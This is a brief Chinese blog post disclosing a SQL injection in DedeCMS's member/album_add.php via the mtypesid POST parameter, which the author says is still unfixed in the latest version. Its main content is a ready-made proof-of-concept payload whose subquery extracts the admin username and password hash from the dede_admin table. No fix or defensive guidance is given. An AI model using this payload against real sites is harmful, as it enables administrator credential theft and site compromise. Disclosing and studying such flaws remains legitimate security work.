dedecms(织梦系统)album_add.php sql注入漏洞

博主推荐【腾讯云】爆款2核2G云服务器首年40元

dedecms一处注入,较鸡肋,之前变量覆盖的漏洞太轰动了,所以一直没发出,之前5月份最新版本测试的,目前最新版本应该是没修复的

漏洞需要会员,所以比较鸡肋啦
发表文章处,post表单的mtypesid可以注入
/dedecmsnew/member/album_add.php
注入POC: mtypesid=1′),(“‘”,’0′,’1367930810′,’p’,’0′,’2′,’-1′,’0′,’0′,(SELECT concat(userid,0x5f,pwd,0x5f) FROM dede_admin where userid=’admin’),”,”,’12333′,”,”,’1367930810′,’1367930810′,’4′,’image’,’test’,’3′)#@`’`’20131008112026447

原创文章转载请注明:转载自 七行者博客

本文固定链接: https://www.qxzxp.com/3505.html

dedecms(织梦系统)album_add.php sql注入漏洞:等您坐沙发呢!

发表评论

5 + 3 =

快捷键:Ctrl+Enter